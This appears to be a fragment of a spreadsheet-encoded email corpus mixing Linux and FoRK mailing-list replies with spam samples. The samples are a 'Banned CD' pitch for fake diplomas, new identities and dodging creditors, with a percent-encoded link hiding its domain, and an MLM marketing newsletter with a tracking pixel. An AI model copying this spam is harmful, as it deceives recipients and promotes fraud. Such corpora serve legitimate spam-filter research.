 &gt; you probably should have used a while loop instead of `for`:
 &gt; i:=0
 &gt; flag:=false
 &gt; while [ i != 100 &amp;&amp; flag != true ]
 &gt; do
 &gt; 	....
 &gt; 	# found our special case set flag to jump out of loop
 &gt; 	flag:=true
 &gt; 	....
 &gt; 	i++;
 &gt; done
 &gt; 
 &gt; If you're using a break or similar construct in a while loop then you might 
 &gt; want to rethink your guard condition.
 Good point, I didn't think of that. However, that doesn't help with a
 case statement, which IMHO is cleaner than using an if statement if you
 have a lot of branches... but then again maybe that should be refactored
 away with polymorphism :)
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Cancelling earthlink
</t>
  </si>
  <si>
    <t xml:space="preserve">Joel Warren wrote:
 &gt; 
 &gt;    Part 1.1    Type: Plain Text (text/plain)
 &gt;            Encoding: quoted-printable
 &gt; Hey Greg!  My name is joel Warren and I need to cancel earthlink. Your message was posted awhile ago so I am not sure if you can still refer me to someone or a # that i can call about cancelling. I would appreciate it!  Thanks! Joel
 Hey Joel,
   Your message wasn't clear if you are cancelling a
 regular earthlink account or the Omnisky inherited one. 
 I'm sure if you call their customer service number
 they can unsubscribe you.   I took me 4 tries,
 so make sure you get a confirmation number.  They'll
 try and not give you one and ignore your call just
 to make it really inconvenient.  
 http://support.earthlink.net/support/CONTACT/phone.jsp
 Out of interest, what search engine and term did you
 do to find that article? 
 Greg
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RUIN ANYONE ANYWHERE ANYTHING
</t>
  </si>
  <si>
    <t xml:space="preserve">I have been receiving emails saying that I'm contributing to the "moral decay of society" by selling the Banned CD.  That may be, but I feel strongly that you have a right to benefit from 
 this hard-to-find information. 
 So I am giving you ONE LAST CHANCE to order the Banned CD! 
 With this powerful CD, you will be able to investigate your friends, enemies and lovers in just minutes using the Internet.  You can track down old flames from college, or you can dig up some dirt on your boss to make sure you get that next promotion! 
 Or maybe you want a fake diploma to hang on your bedroom wall.  You'll find addresses for companies that make these diplomas on the Banned CD. 
 Need to disappear fast and never look back?  No problem! 
 Using the Banned CD, you will learn how to build a completely 
 new identity. 
 Obviously, the Powers That Be don't want you to have the Banned CD.  They have threatened me with lawsuits, fines, and even imprisonment unless I stop selling it immediately. But I feel that YOU have a Constitutional right to access this type of information, and I can't be intimidated. 
  Uncle Sam and your creditors are horrified that I am still selling this product!  There must be a price on my head! 
 Why are they so upset? Because this CD gives you freedom. 
 And you can't buy freedom at your local Walmart.  You will 
 have the freedom to avoid creditors, judgments, lawsuits, IRS 
 tax collectors, criminal indictments, your greedy ex-wife or 
 ex-husband, and MUCH more!
 Please Click the URL for the Detail! 
 http://%62a%6E%6E%65d%63%64.%6E%65%74 
 You are receiving this special offer because you have provided permission to receive third party email communications regarding special online promotions or offers. We strongly oppose the use of SPAM email and do not want to send our mailings to anyone who does not wish to receive them. If you do not wish to receive any further messages from NET Easy. To Be Removed From Our List,
  http://%62a%6E%6E%65d%63%64.%6E%65%74/remove.html
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; Subject: Re: Digital radio playlists are prohibited?!
 &gt; From: James Rogers &lt;jamesr@best.com&gt;
 &gt; To: fork@example.com
 &gt; Date: 25 Sep 2002 12:52:15 -0700
 &gt; 
 &gt; On Wed, 2002-09-25 at 01:19, Rohit Khare wrote:
 &gt; &gt; Anyone heard of this law before?
 &gt; 
 &gt; 
 &gt; Absolutely.  More accurately, it is part of the RIAAs "regulation" for
 &gt; broadcasting music under their auspices.  This is actually part of the
 &gt; default statutory license the RIAA is compelled to issue.  You can try
 &gt; and establish your own contract with each of the individual publishers
 &gt; in addition to the writers, but that is a Herculean undertaking in its
 &gt; own right.  The details are really gross and complicated.
 Perhaps the stations cannot publish digital playlists, but you can get
 them from www.starcd.com anyway. They use some sort of
 listening and recognition technology to identify the music played
 on over 1000 US radio stations.
 Jeff;
</t>
  </si>
  <si>
    <t xml:space="preserve">James Rogers wrote:
 &gt;I don't think a ballistic missile defense system will be much help
 &gt;against a rock a couple thousand kilometers in diameter.
 That would destroy Earth completely!  The one in question is 2.06 km
 (1.28 miles) in diameter.
 R
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Tue, Aug 13, 2002 at 12:22:14PM +0100, Niall O Broin wrote:
 &gt; What are the best options available on Linux ? SFTP ? WebDAV ? Something
 &gt; else ? Linux servers - Linux and Mac OS-X clients.
 &gt; 
 If you mean secure file transfer
 scp is good
 -- 
 Redbrick - Dublin City University Networking Society
 Declan McMullen - Education Officer
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Membership Community &amp; Commentary, 07-06-01
</t>
  </si>
  <si>
    <t xml:space="preserve">
 ---1347074105.994417746234.JavaMail.RovAdmin.rovweb002
 Content-Type: text/plain; charset=iso-8859-1
 Your Membership Community &amp; Commentary (July 6, 2001)
 It's All About Making Money
 Information to provide you with the absolute 
 &lt;br&gt;best low and no cost ways of providing traffic 
 &lt;br&gt;to your site, helping you to capitalize on the power &lt;br&gt;and potential the web brings to every Net-Preneur. &lt;br&gt;
 --- This Issue Contains Sites Who Will Trade Links With You! --- &lt;br&gt;
 -------------
 IN THIS ISSUE
 -------------
 Internet Success Through Simplicity
 Member Showcase
 Win A FREE Ad In Community &amp; Commentary
 ||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;
     Today's Special Announcement:
 ||| =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=&gt;&gt;
 &lt;br&gt;We can help you become an Internet Service &lt;br&gt;provider within 7 days or we will give you $100.00!!
 &lt;br&gt;&lt;a href="http://www.SELLinternetACCESS.com"&gt;Click Here&lt;/a&gt;
 &lt;br&gt;We have already signed 300 ISPs on a 4 year contract, 
 &lt;br&gt;see if any are in YOUR town at:
 &lt;br&gt;&lt;a href="http://www.Find-Local-ISP.com"&gt;Click Here&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;&lt;p&gt;
 &lt;br&gt;&amp;nbsp;&lt;p&gt;
 You are a member in at least one of these programs 
 - You should be in them all! &lt;br&gt;
 &lt;a href="http://www.BannersGoMLM.com"&gt; BannersGoMLM.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.ProfitBanners.com"&gt; ProfitBanners.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.CashPromotions.com"&gt; CashPromotions.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.MySiteInc.com"&gt; MySiteInc.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.TimsHomeTownStories.com"&gt; TimsHomeTownStories.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.FreeLinksNetwork.com"&gt; FreeLinksNetwork.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.MyShoppingPlace.com"&gt; MyShoppingPlace.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.BannerCo-op.com"&gt; BannerCo-op.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.PutPEEL.com"&gt; PutPEEL.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.PutPEEL.net"&gt; PutPEEL.net &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.SELLinternetACCESS.com"&gt; SELLinternetACCESS.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.Be-Your-Own-ISP.com"&gt; Be-Your-Own-ISP.com &lt;/a&gt;
 &lt;br&gt;&lt;a href="http://www.SeventhPower.com"&gt; SeventhPower.com &lt;/a&gt;&lt;p&gt;
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Internet Success Through Simplicity
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 &lt;BR&gt;Every day of the week, I get questions from people all  
  &lt;BR&gt;over the world, including my No BS GIMG Members,  
  &lt;BR&gt;wanting to know some of the most valuable "secrets" 
  &lt;BR&gt;to my on-going internet success.
  &lt;BR&gt;
  &lt;BR&gt;Let me say, above all else, I don't believe there are any 
  &lt;BR&gt;*true* "secrets" to success on the Net. What you do to 
  &lt;BR&gt;become successful in the online world is not a "secret", 
  &lt;BR&gt;in my opinion. Most successful people follow simple, clear, 
  &lt;BR&gt;repeatedly-proven strategies to succeed, whether on the 
  &lt;BR&gt;Net or off.
  &lt;BR&gt;
  &lt;BR&gt;But, when it comes to someone asking for advice, 
  &lt;BR&gt;consultation, or simply asking, "What's your secret?", 
  &lt;BR&gt;I have to blush &amp; say ...
  &lt;BR&gt;
  &lt;BR&gt;Persistence and personality.
  &lt;BR&gt;
  &lt;BR&gt;Of course, I always follow the advice with my own little 
  &lt;BR&gt;disclaimer: What makes ME successful may not work the 
  &lt;BR&gt;same for YOU ... &amp; your first lesson is to get over 
  &lt;BR&gt;the deep-seeded idea that success - of any kind, in  
  &lt;BR&gt;my opinion - is somehow an unknown, unattainable secret.
  &lt;BR&gt;
  &lt;BR&gt;Clearly, it is not. It's not unknown. It's not unattainable. 
  &lt;BR&gt;It's not years of digging to find the "secrets" to internet riches.
  &lt;BR&gt;
  &lt;BR&gt;One thing that "gets to me" so often in my work as an 
  &lt;BR&gt;Internet Consultant, author and Internet Success 
  &lt;BR&gt;Strategist is that so many people on the Net seem to 
  &lt;BR&gt;have this incredibly huge mental block that stands 
  &lt;BR&gt;between themselves and success on the Net. It's 
  &lt;BR&gt;almost as if they've been barraged by so many claims 
  &lt;BR&gt;of what works and what doesn't work, and so many 
  &lt;BR&gt;LONG, complicated routes to actually succeeding in 
  &lt;BR&gt;their online venture, that "success" is the  &lt;BR&gt;equivelant of a 100-foot high brick wall.
  &lt;BR&gt;
  &lt;BR&gt;It's NOT that difficult, my friends! It is NOT that complicated!!
  &lt;BR&gt;
  &lt;BR&gt;Long-time friend and business associate Rick Beneteau 
  &lt;BR&gt;has a new eBook out called Branding YOU &amp; Breaking 
 &lt;BR&gt;the Bank. Get it!! 
  &lt;BR&gt;&lt;a href="http://www.roibot.com/bybb.cgi?IM7517_bybtb"&gt;http://www.roibot.com/bybb.cgi?IM7517_bybtb&lt;/a&gt; . 
  &lt;BR&gt;But, the reason I mention this is the fact that he talks 
  &lt;BR&gt;so dynamically about the true simplicity of making your 
  &lt;BR&gt;online venture a success. 
  &lt;BR&gt;
  &lt;BR&gt;And, yes, Rick &amp; I come from the same school of 
  &lt;BR&gt;"self marketing" - marketing YOU! Obviously, that's 
  &lt;BR&gt;the core of his excellent new ebook, and I couldn't 
  &lt;BR&gt;agree with him more.
  &lt;BR&gt;
  &lt;BR&gt;Point being, *you* ARE everything you do online to 
  &lt;BR&gt;succeed. You ARE your web site, your business, your 
  &lt;BR&gt;marketing piece, your customer service, your customers' 
  &lt;BR&gt;experiences with your business -- ALL of it, is YOU! 
  &lt;BR&gt;Read his ebook &amp; you'll see more of what I'm saying.
  &lt;BR&gt;
  &lt;BR&gt;The matter at hand is that brick wall you might have 
  &lt;BR&gt;standing high as you can see, blocking the path 
  &lt;BR&gt;between you &amp; internet success. Listen to me - it is 
  &lt;BR&gt;not real OK? It doesn't exist. There's nothing there 
  &lt;BR&gt;to fear to begin with ... get over it!!
  &lt;BR&gt;
  &lt;BR&gt;What I'm telling you is, the only thing standing between 
  &lt;BR&gt;you and the success you most desire ... is yourself. 
  &lt;BR&gt;When you realize this, you will tear down that brick 
  &lt;BR&gt;wall by means of complete and instantaneous 
  &lt;BR&gt;disintegration. It will no longer exist *in your mind*, 
  &lt;BR&gt;which is the only "real" place it ever was anyhow!
  &lt;BR&gt;
  &lt;BR&gt;Yes, "persistence and personality" inherently includes 
  &lt;BR&gt;honesty, integrity, accountability, and many other 
  &lt;BR&gt;qualities but you also have to hone in on your ultimate 
  &lt;BR&gt;goals and realize that probably the most valuable,  
  &lt;BR&gt;powerful key to your success ... is YOU!
  &lt;BR&gt;
  &lt;BR&gt;That may be the most incredible "secret" we ever 
  &lt;BR&gt;uncover in our lifetime! And, trust me, that brick wall 
  &lt;BR&gt;won't ever get in your way again ... unless you let it.
  &lt;BR&gt;
  &lt;BR&gt;Talk about SIMPLE!!
  &lt;BR&gt;
  &lt;BR&gt;------------------------------------------------------
  &lt;BR&gt;Bryan is a "veteran"  Internet  Consultant, Author, 
  &lt;BR&gt;Internet Success Strategist &amp; Marketer. He publishes 
  &lt;BR&gt;Mega-Success.com Chronicles to over 11,500  subscribing 
  &lt;BR&gt;members, authors articles which appear all over the 
  &lt;BR&gt;Net, and helps hundreds of wealth-hungry people in 
  &lt;BR&gt;their journey to Internet success. 
  &lt;BR&gt;
  &lt;BR&gt;Bryan is also Director of his No BS Guerrilla Internet 
  &lt;BR&gt;Marketing Group at &lt;a href="http://NoBSGuerrillaInternetMarketing.com"&gt;http://NoBSGuerrillaInternetMarketing.com&lt;/a&gt; 
  &lt;BR&gt;&amp; a fantastic new Joint Venture Partners program 
  &lt;BR&gt; for that site.
  &lt;BR&gt;
  &lt;BR&gt;Bryan Hall is a Founding Member and the Development 
  &lt;BR&gt;Consultant for the prestigious iCop(TM) at 
  &lt;BR&gt;&lt;a href="http://www.i-cop.org/1016.htm
 "&gt;http://www.i-cop.org/1016.htm
 &lt;/a&gt; &lt;BR&gt;
  &lt;BR&gt;You  can  reach  Bryan  at  877.230.3267  or  by
  &lt;BR&gt;emailing  him directly at bryan.hall@mega-success.com
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Member Showcase
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 &lt;p&gt;&lt;i&gt;Examine carefully - Those with email addresses included WILL&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;TRADE LINKS with you... You are encouraged to contact them.&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;There Are Many Ways To Build A Successful Business - Just look at&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;these successful sites &amp;amp; programs other members are involved
 in...&lt;/i&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;Get INSANE amounts of traffic to your website.
 &lt;br&gt;Purchase 10,000 Guaranteed Visitors to your site
 &lt;br&gt;and receive 5,000 free. MORE TRAFFIC = MORE MONEY!
 &lt;br&gt;Less than 2cents a visitor.&amp;nbsp; Space is limited.
 &lt;br&gt;Order Now! &lt;a href="http://www.freepicklotto.com"&gt;http://www.freepicklotto.com&amp;nbsp;&lt;/a&gt;
 &lt;br&gt;Trade Links - &lt;a href="mailto:businessopps@aol.com"&gt;businessopps@aol.com&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;Stop Smoking - Free Lesson !!
 &lt;br&gt;Discover the Secret to Stopping Smoking.
 &lt;br&gt;To Master these Powerful Techniques, Come to
 &lt;br&gt;&lt;a href="http://www.breath-of-life.net"&gt;http://www.breath-of-life.net&lt;/a&gt;
 for your Free Lesson.
 &lt;br&gt;Act Now!&amp;nbsp; P.S. Tell someone you care about.
 &lt;br&gt;Trade Links - &lt;a href="mailto:jturco3@hotmail.com"&gt;jturco3@hotmail.com&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;Celebration Sale!
 &lt;br&gt;$99.00 on Casinos/Sportsbetting sites, Lingerie stores,
 &lt;br&gt;Gift Stores, Adult Sites &amp;amp; Toy Stores.
 &lt;br&gt;Mention Ad#BMLM99 to receive this special sale price.
 &lt;br&gt;Order Now!
 &lt;br&gt;&lt;a href="http://www.cyberopps.com/?=BMLM99"&gt;http://www.cyberopps.com/?=BMLM99&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;Affiliates of the World!
 &lt;br&gt;Top rated affiliate programs, excellent business opportunities,
 &lt;br&gt;great marketing resources and free advertising for you!
 &lt;br&gt;Visit the site to trade links. &lt;a href="http://www.affiliates.uk.com"&gt;http://www.affiliates.uk.com&lt;/a&gt;
 &lt;br&gt;Trade Links - &lt;a href="mailto:adrianbold@affiliates.uk.com"&gt;adrianbold@affiliates.uk.com&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;JUST BEEN RELEASED!!
 &lt;br&gt;Internet Marketing guru Corey Rudl has just released a
 &lt;br&gt;BRAND NEW VERSION of his #1 best-selling Internet Marketing
 &lt;br&gt;Course,"The Insider Secret's to Marketing Your Business on
 &lt;br&gt;the Internet". A MUST HAVE! So don't hesitate,
 &lt;br&gt;visit.. &lt;a href="http://www.adminder.com/c.cgi?start&amp;bgmlmezine"&gt;http://www.adminder.com/c.cgi?start&amp;amp;bgmlmezine&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;We have a 260 page catalog with over 3000 gift items for men,
 &lt;br&gt;women, children - A gift for everyone. We show 100 gift items
 &lt;br&gt;on our web site alone, with the catalog&amp;nbsp; you have access to
 &lt;br&gt;the rest. We also feel we have the best prices on the web.
 &lt;br&gt;Visit at &lt;a href="http://www.treasuresoftomorrow.net"&gt;http://www.treasuresoftomorrow.net&lt;/a&gt;
 &lt;br&gt;Trade Links - &lt;a href="mailto:george1932me@yahoo.com"&gt;george1932me@yahoo.com&lt;/a&gt;
 &lt;br&gt;-------------------------------------------------
 &lt;p&gt;&lt;i&gt;If you have a product, service, opportunity or quality merchandise&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;that appeals to people worldwide, reach your targeted audience!&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;For a fraction of what other large newsletters charge you can exhibit&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;your website here, and trade links for only $8 CPM.&amp;nbsp; Compare
 that&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;to the industry average of $10-$15 CPM. Why?... Because as a&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;valuable member we want you to be successful! Order today -&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;Showcases are limited and published on a first come, first serve
 basis.&lt;/i&gt;
 &lt;br&gt;&lt;i&gt;For our secure order form, click here:&lt;/i&gt; &lt;a href="http://bannersgomlm.com/ezine"&gt;http://bannersgomlm.com/ezine&lt;/a&gt;
 &lt;br&gt;
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 Win A FREE Ad In Community &amp; Commentary
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 &lt;p&gt;To keep this interesting, how about this, every month we'll
 &lt;br&gt;draw a name from the replies and that person will win one
 &lt;br&gt;Sponsorship Showcase ad in the Community &amp;amp; Commentary, for FREE.
 &lt;br&gt;That's a value of over $700.00! Respond to each weekly survey,
 &lt;br&gt;and increase your chances to win with four separate entries.
 &lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; QUESTION
 OF THE WEEK (07/06/01)...
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; No right or wrong answers, and just by answering
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; you are entered to win a Showcase ad - Free!
 &lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ~~~ Do you spend more or less time ~~~
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ~~~ online in the summer months? ~~~
 &lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; More&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="mailto:one@AEOpublishing.com"&gt;mailto:one@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Less&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="mailto:two@AEOpublishing.com"&gt;mailto:two@AEOpublishing.com&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Same&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &lt;a href="mailto:three@AEOpublishing.com"&gt;mailto:three@AEOpublishing.com&lt;/a&gt;
 &lt;p&gt;To make this as easy as possible for you, just click on the
 &lt;br&gt;e-mail address that matches your answer - you do not need to
 &lt;br&gt;enter any information in the subject or body of the message.
 &lt;p&gt;** ADD YOUR COMMENTS!&amp;nbsp; Follow directions above and
 &lt;br&gt;add your comments in the body of the message, and we'll
 &lt;br&gt;post the best commentaries along with the responses.
 &lt;p&gt;You will automatically be entered in our drawing for a free
 &lt;br&gt;Sponsorship ad in the Community &amp;amp; Commentary. Please
 &lt;br&gt;respond only one time per question.&amp;nbsp; Multiple responses
 &lt;br&gt;from the same individual will be discarded.
 &lt;p&gt;
 Last Weeks's Results (06/29/01)
 &lt;BR&gt;&lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; ~~~ What is the goal of your website? ~~~
 &lt;p&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Sell&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;40%
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Get Leads&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;20%
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Build Branding&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;5%
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Provide Information&amp;nbsp; 20%
 &lt;br&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; Other&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 15%
 &lt;p&gt;
 Comments:
 &lt;BR&gt;----------------------------
 &lt;BR&gt;Our web site is initially designed to get leads, build 
 branding, and provide information.......with a 12 month goal 
 of selling our service more specifically via a shopping cart. 
 We offer a service and at this time take deposits and payments 
 via our site.
 Our site has been up less than 2 months and our expectation 
 was that we would refer to our site for leads developed in 
 traditional media and by referral for more information, and 
 to make a professional impression on someone you may not 
 meet before providing service.
 The growth of our customer base shopping on line has grown 
 outside of anyone's expectations.......certainly mine and 
 I've been in this business for 25 years. The Internet is not 
 dead in the horse business, it is just getting it's legs, and 
 the folks using it want to get all the ancillary services 
 on-line as well. Our site (the first we've developed) has 
 exceeded our expectations, and we aren't satisfied with it 
 yet.......we just wanted to get it there for information!
 &lt;BR&gt; Jeff and Rebecca Marks &lt;a href="http://www.grand-champion.com"&gt;http://www.grand-champion.com&lt;/a&gt;
 &lt;P&gt;-------------------------------------------------
 &lt;BR&gt;Branding. While quality customer service and product 
 have been and will always be our top priority brand building 
 Zesto is our most challenging task.
 &lt;BR&gt;Zesto.com ranks very high and most often #1 or 2 on 
 all major search engines and directories even Yahoo entering 
 the keyword zesto. The problem is simply that,who if anyone 
 would type the keyword zesto, therefore we must try to 
 build our brand by ensuring that generic keywords associated with our products (citrus peel) are used throughout 
 our site as well as search engine submissions.
 &lt;BR&gt;Fortunately owning a non generic domain short, easy 
 to remember and trademarked works in our favor because 
 the marketability potential is limitless.
 &lt;BR&gt;Arlene Turner  &lt;a href="http://www.zesto.com"&gt;http://www.zesto.com&lt;/a&gt;
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
 To change your subscribed address,
 &lt;br&gt;send both new and old address to &lt;a href="mailto:Submit@AEOpublishing.com"&gt;Submit&lt;/a&gt;
 &lt;br&gt;See below for unsubscribe instructions.
 &lt;p&gt;Please send suggestions and comments to: &lt;a href="mailto:Editor@AEOpublishing.com"&gt;Editor&lt;/a&gt;
 &lt;br&gt;I invite you to send your real successes and showcase 
 your strategies and techniques, or yes, even your total bombs, 
 "Working Together We Can All Prosper." &lt;a href="mailto:Submit@AEOpublishing.com"&gt;Submit&lt;/a&gt;
 &lt;p&gt;For information on how to sponsor Your Membership 
 Community &amp;amp; Commentary visit: &lt;a href="http://bannersgomlm.com/ezine"&gt;Sponsorship
 Showcase&lt;/a&gt;
 &lt;p&gt;Copyright 2001 AEOpublishing.com
 ------------------------------------------------
 email:  YourMembership2@AEOpublishing.com
 voice:  
 web: http://www.AEOpublishing.com
 ------------------------------------------------
 This email has been sent to jm@netnoteinc.com at your 
 request, by Your Membership Newsletter Services.
 Visit our Subscription Center to edit your interests or unsubscribe.
 http://ccprod.roving.com/roving/d.jsp?p=oo&amp;id=bd7n7877.7giv5d57&amp;m=bd7n7877&amp;ea=jm@netnoteinc.com
 View our privacy policy: http://ccprod.roving.com/roving/CCPrivacyPolicy.jsp
 Powered by 
 Constant Contact(R)
 www.constantcontact.com
 ---1347074105.994417746234.JavaMail.RovAdmin.rovweb002
 Content-Type: text/html; charset=iso-8859-1
 &lt;HTML&gt;
 &lt;!-- 
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;HTML-FORMATTED MESSAGE BELOW
 The remainder of this message is in HTML format for use by email
 clients that can properly display it.   If you are seeing this message,
 it is because your email client cannot properly display HTML.  You can
 ignore the HTML code you will see below.
  --&gt;
 &lt;head&gt;
 	&lt;title&gt;Your Membership Community &amp; Commentary, 07-06-01&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#ffffff" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"&gt;
 &lt;IMG SRC="http://ccprod.roving.com/roving/sa/o.jsp?id=bd7n7877.7giv5d57&amp;o=http://ccprod.roving.com/roving/images/p1x1.gif" WIDTH=1 HEIGHT=1 alt=" "&gt;
 &lt;!--  Do NOT delete previous line if you want to get statistics on the number of opened emails  --&gt;
 &lt;center&gt;
 &lt;table border="1" bordercolor="#003366" cellpadding="0" cellspacing="0" width="610"&gt;
 &lt;tr&gt;
 	&lt;td&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&gt;
 &lt;!-- Begin Logo Include --&gt;
 &lt;!-- START CONDITIONAL HTML HIDING 
 &lt;tr&gt;
 	&lt;td colspan="2" align="center"&gt;&lt;img src="" border="0" alt="Your Membership Newsletter Services"&gt;&lt;/td&gt;
 &lt;/tr&gt;
  END OF CONDITIONAL HTML HIDING --&gt; 
 &lt;!-- End Logo Include --&gt;
 &lt;tr&gt;
 	&lt;td colspan="2" align="center" valign="middle" bgcolor="#668ABE" height="60"&gt;&lt;font face="Georgia,'Times New Roman',Times,serif" size="6" color="#ffffff"&gt;Your Membership Community &amp; Commentary&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;
 	&lt;td align="left"&gt;&amp;nbsp;&amp;nbsp;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;b&gt;It's All About Making Money&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
 	&lt;td align="right"&gt;&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;b&gt;July 6, 2001&lt;/b&gt;&lt;/font&gt;&amp;nbsp;&amp;nbsp;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;
 &lt;table border="0" cellpadding="0" cellspacing="0" width="100%"&gt;
 &lt;tr&gt;
 	&lt;td width="190" bgcolor="#EEEEDF" align="center" valign="top"&gt;
 	&lt;!-- Begin Table of Contents Header Table --&gt;
 		&lt;table border="1" bordercolor="#003366" cellpadding="2" cellspacing="0" width="190"&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#ffffff" align="center" valign="top"&gt;
 			&lt;font face="Georgia,'Times New Roman',Times,serif" size="3" color="#003366"&gt;
 			&lt;b&gt;in this issue&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;!-- End Table of Contents Header Table --&gt;
 	&lt;!-- Begin Article Headlines Table --&gt;
 		&lt;table border="0" cellpadding="2" cellspacing="0" width="190"&gt;
 		&lt;tr&gt;
 			&lt;td bgcolor="#DBE8F4" align="center" valign="top"&gt;
 			&lt;font size="2" face="Verdana,Arial,Helvetica" color="#003366"&gt;&lt;b&gt;
 			&lt;br&gt;&lt;a href="#article1"&gt;Internet Success Through Simplicity&lt;/a&gt;
 			&lt;p&gt;&lt;a href="#article2"&gt;Member Showcase&lt;/a&gt;
 			&lt;p&gt;&lt;a href="#article3"&gt;&lt;/a&gt;
 			&lt;p&gt;&lt;a href="#article4"&gt;Win A FREE Ad In Community &amp; Commentary&lt;/a&gt;
 			&lt;p&gt;&lt;a href="#article5"&gt;&lt;/a&gt;
